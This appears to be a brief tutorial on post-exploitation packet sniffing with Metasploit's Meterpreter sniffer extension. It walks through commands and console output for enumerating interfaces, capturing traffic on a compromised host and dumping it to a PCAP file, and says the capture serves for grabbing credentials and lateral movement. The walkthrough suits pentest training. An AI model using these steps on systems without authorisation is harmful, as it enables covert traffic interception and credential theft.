Meterpreter allow you to run packet sniffer with extension, and something very important is that the sniffer is never saved in the target hard drive. I will explaint hwo to enable packet sniffer with Metasploit with Meterpreter:


Lets consider you are already connect with any exploit and meterpreter enable, then you type the following:


###user sniffer extension


meterpreter > use sniffer


Loading extension sniffer...success.


meterpreter > ?





Sniffer Commands



    Command             Description

    -------             -----------

    sniffer_dump        Retrieve captured packet data to PCAP file

    sniffer_interfaces  Enumerate all sniffable network interfaces

    sniffer_release     Free captured packets on a specific interface instead of downloading them

    sniffer_start       Start packet capture on a specific interface

    sniffer_stats       View statistics of an active capture

    sniffer_stop        Stop packet capture on a specific interface

### We try to see what interface we will to use to sniff the traffic
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
###You can see the interface 2 is the network one, we will start using that interface:
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
### Stop the sniffer
meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
### Download the data
meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap
The I was able to open the file using wireshark raul.pcap
Where can you use this? You can use it to grab credentials, move horizontal on the network if you are pentesting a network or if you are troubleshooting any computer problem on the network.